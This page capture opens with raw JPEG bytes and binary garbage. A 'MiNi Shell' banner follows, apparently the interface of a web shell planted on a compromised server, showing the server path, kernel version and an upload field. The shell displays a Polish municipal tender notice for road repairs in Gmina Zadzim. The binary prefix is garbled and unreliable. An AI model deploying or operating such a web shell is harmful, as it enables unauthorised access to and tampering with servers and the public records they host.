JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240415/0028460601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont i przebudowa dróg gminnych na terenie Gminy Zadzim – etap II.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zadzim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934341</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zadzim 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zadzim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-232</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">436786160</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">436786660</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug_zadzim@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminazadzim.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont i przebudowa dróg gminnych na terenie Gminy Zadzim – etap II.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-30f3d21d-faf9-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00284606</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00019197/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont i przebudowa dróg gminnych na terenie gminy Zadzim - etap II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-30f3d21d-faf9-11ee-b016-82aaee56c84c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami prowadzona jest przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18<br/>lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344), za pośrednictwem Platformy e-Zamówienia,<br/>która jest dostępna pod adresem: https://ezamowienia.gov.pl.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl.<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszystkie wysłane i odebrane w<br/>postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy<br/>do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje<br/>dotyczące specyfikacji połączenia określa „Regulamin Platformy e-Zamówienia”.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UEL 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Pani/Pana danych osobowych jest Gmina Zadzim, Zadzim 44, 99-232 Zadzim. Administrator powołał Inspektora Ochrony Danych. Ma Pani/Pan prawo do skontaktowania się z Inspektorem Ochrony Danych poprzez wysłanie wiadomości elektronicznej na adres: ug_zadzim@wwp.pl lub wysyłając korespondencję na adres: Urząd Gminy w Zadzimiu, Zadzim 44, 99-232 Zadzim Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. cRODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: „Remont i przebudowa dróg gminnych na terenie Gminy Zadzim – etap II.” prowadzonym w trybie<br/>podstawowym bez negocjacji;<br/>odbiorcami Pani/Pana danych osobowych będzie Urząd Gminy Zadzim oraz osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 zwanej dalej Ustawą; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan prawo dostępu do danych osobowych, które Pani/Pana dotyczą, prawo do sprostowania Pani/Pana danych osobowych, prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>􀀀w przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, ma<br/>Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Podane przez Panią/a dane będą przechowywane przez okres 4 lat od dnia zakończenia postępowania. Jeżeli okres obowiązywania zamówienia publicznego przekroczy 4 lata, administrator przechowuje dane przez cały okres obowiązywania tej umowy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IK.271.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiot zamówienia obejmuje przebudowę i remont następujących dróg:<br/>1) Przebudowę drogi wewnętrznej w miejscowości Babiniec o długości 698 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze<br/>• roboty rozbiórkowe<br/>• cięcia pielęgnacyjne – podkrzesanie krzewów<br/>• roboty ziemne<br/>• regulacja pionowa urządzeń<br/>• poszerzenia drogi na łukach<br/>• jezdnia o nawierzchni asfaltowej<br/>• roboty wykończeniowe<br/>• oznakowanie pionowe<br/>• inwentaryzacja powykonawcza<br/><br/>2) Przebudowę drogi gminnej 111006E Urszulin – Wola Sipińska o długości 1430 mb.<br/> Zakres robót obejmuje: <br/> • roboty przygotowawcze <br/> • roboty rozbiórkowe <br/> • cięcie pielęgnacyjne – podkrzesanie krzewów <br/> • roboty ziemne <br/> • remont przepustów drogowych <br/> • regulacja pionowa urządzeń <br/> • poszerzenia drogi na łukach <br/> • jezdnia o nawierzchni asfaltowej <br/> • roboty wykończeniowe <br/> • bariery ochronne <br/> • oznakowanie pionowe <br/> • inwentaryzacja powykonawcza <br/><br/>3) Przebudowę drogi wewnętrznej w miejscowości Dzierzązna Szlachecka o długości 505 mb.<br/> Zakres robót obejmuje: <br/><br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• roboty ziemne <br/>• remont przepustów drogowych <br/>• poszerzenia drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• bariery ochronne <br/>• oznakowanie pionowe<br/>• inwentaryzacja powykonawcza <br/><br/>4) Przebudowę drogi wewnętrznej w miejscowości Zygry o długości 408 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze<br/>• roboty rozbiórkowe<br/>• cięcia pielęgnacyjne – podkrzesanie krzewów<br/>• roboty ziemne<br/>• remont przepustów drogowych<br/>• poszerzenia drogi na łukach<br/>• jezdnia o nawierzchni asfaltowej<br/>• roboty wykończeniowe<br/>• oznakowanie pionowe<br/>• inwentaryzacja powykonawcza<br/><br/>5) Remont drogi gminnej 111276E Maksymilianów - Chodaki o długości 890 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• regulacja pionowa urządzeń <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe <br/><br/>6) Remont drogi gminnej 111266E Ralewice o długości 670 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• regulacja pionowa urządzeń <br/>• poszerzenia drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe <br/><br/>7) Remont drogi gminnej 111267E Grabina - Skęczno o długości 830 mb.<br/> Zakres robót obejmuje: <br/><br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• regulacja pionowa urządzeń <br/>• zabezpieczenie betonu <br/>• izolacja płyty pomostu obiektu mostowego z papy termozgrzewalnej <br/>• urządzenia dylatacyjne <br/>• gzyms <br/>• nawierzchnia epoksydowo-poliuretanowa <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty nawierzchniowe na moście <br/>• balustrady stalowe na obiekcie mostowym <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe <br/><br/>8) Remont drogi gminnej 111268E Górki Zadzimskie o długości 990 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• remont przepustów drogowych <br/>• poszerzenie drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe <br/><br/>9) Remont drogi gminnej 111257E o długości Grabinka – Pałki – Wola Sipińska o długości 2 155 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• roboty ziemne <br/>• poszerzenia drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• bariery ochronne <br/>• oznakowanie pionowe <br/><br/>10) Remont drogi wewnętrznej w miejscowości Wierzchy o długości 700 mb.<br/> Zakres robót obejmuje:<br/>• roboty przygotowawcze<br/>• roboty rozbiórkowe<br/>• cięcia pielęgnacyjne – podkrzesanie krzewów<br/>• poszerzenie drogi na łukach<br/>• jezdnia o nawierzchni asfaltowej<br/>• roboty wykończeniowe<br/>• oznakowanie pionowe<br/>11) Przebudowa drogi wewnętrznej w miejscowości Charchów Pański o długości 390 mb.<br/> Zakres robót obejmuje: <br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• roboty ziemne <br/>• remont przepustów drogowych <br/>• regulacja pionowa urządzeń <br/>• poszerzenia drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe<br/>• inwentaryzacja powykonawcza <br/> <br/>12) Przebudowa drogi wewnętrznej w miejscowości Kraszyn o długości 390 mb.<br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• roboty ziemne <br/>• remont przepustów drogowych <br/>• regulacja pionowa urządzeń <br/>• poszerzenia drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe<br/>• inwentaryzacja powykonawcza <br/><br/>13) Przebudowa drogi wewnętrznej w miejscowości Skęczno o długości 515 mb.<br/>• roboty przygotowawcze <br/>• roboty rozbiórkowe <br/>• cięcie pielęgnacyjne – podkrzesanie krzewów <br/>• roboty ziemne <br/>• remont przepustów drogowych <br/>• regulacja pionowa urządzeń <br/>• poszerzenia drogi na łukach <br/>• jezdnia o nawierzchni asfaltowej <br/>• roboty wykończeniowe <br/>• oznakowanie pionowe<br/>• inwentaryzacja powykonawcza. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie dokonana zgodnie z poniższymi kryteriami:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy dotyczące braku do wykluczenia z postępowania i spełnianiu warunków udziału w postępowaniu - Zał. nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy dotyczące braku do wykluczenia z postępowania i spełnianiu warunków udziału w postępowaniu - Zał. nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 3) sytuacji ekonomicznej lub finansowej:<br/>W celu potwierdzenia spełnienia przez Wykonawcę kryterium posiadania sytuacji ekonomicznej i finansowej zapewniającej<br/>wykonanie zamówienia Zamawiający żąda przedstawienia przez Wykonawcę:<br/>a) posiadania zdolność kredytową lub środki finansowe w wysokości nie mniejszej niż<br/>6 000 000,00 zł. (słownie: sześć milionów złotych brutto.)<br/>b) polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia; minimalna suma gwarancyjna ubezpieczenia 7 000 000,00 zł. (słownie: siedem milionów złotych brutto).<br/>a1) Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych<br/>środków dowodowych, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają<br/>spełnienie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub<br/>finansowej; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawca składa wykaz robót potwierdzający, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: wykonał zgodnie z zasadami sztuki budowlanej i<br/>prawidłowo ukończył minimum 1 zadanie<br/>którego przedmiotem była budowa, przebudowa lub remont dróg o wartości minimum 6 000 000,00 zł. ( sześć milionów<br/>złotych brutto) oraz przedłożenie dokumentów potwierdzających, że roboty zostały wykonane należycie, zgodnie z zasadami<br/>sztuki budowlanej i prawidłowo ukończone. – załącznik nr 11 do SWZ.<br/>- Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi oraz pracami projektowymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 12 do SWZ.<br/>- Wykaz sprzętu jakim Wykonawca będzie dysponował w okresie realizacji zamówienia, co najmniej:<br/>- równiarka,<br/>- koparka lub koparko – ładowarka,<br/>- rozkładarka masy i tłucznia,<br/>- walec – 2 sztuki,<br/>- samochody ciężarowe - 5 sztuk, spełniające normy emisji spalin EURO 6.<br/>Wykonawca przedstawi dokumenty potwierdzające emisję spalin EURO 6.<br/>Zamawiający wymaga, aby przynajmniej jeden pojazd biorący udział w powyższym zamówieniu zgodnie z ustawą z dnia<br/>11.01.2018 roku o elektromobilnosci i paliwach alternatywnych (Dz. U. z 2022 r. poz. 1083) spełniał postanowienia<br/>Dyrektywy Parlamentu Europejskiego i Rady (UE) 2019/1161 z dnia 20 czerwca 2019 r. w sprawie promowania ekologicznie<br/>czystych i energooszczędnych pojazdów transportu drogowego i był pojazdem zeroemisyjnym lub niskoemisyjnym<br/>wykorzystującym do napędu paliwo alternatywne (energię elektryczną lub wodór, biopaliwa ciekłe, paliwa syntetyczne i<br/>parafinowe, sprężony gaz ziemny CNG, skroplony gaz ziemny LNG). Przez pojazd elektryczny rozumie się pojazd<br/>samochodowy (zgodnie z ustawą Prawo o ruchu drogowym) 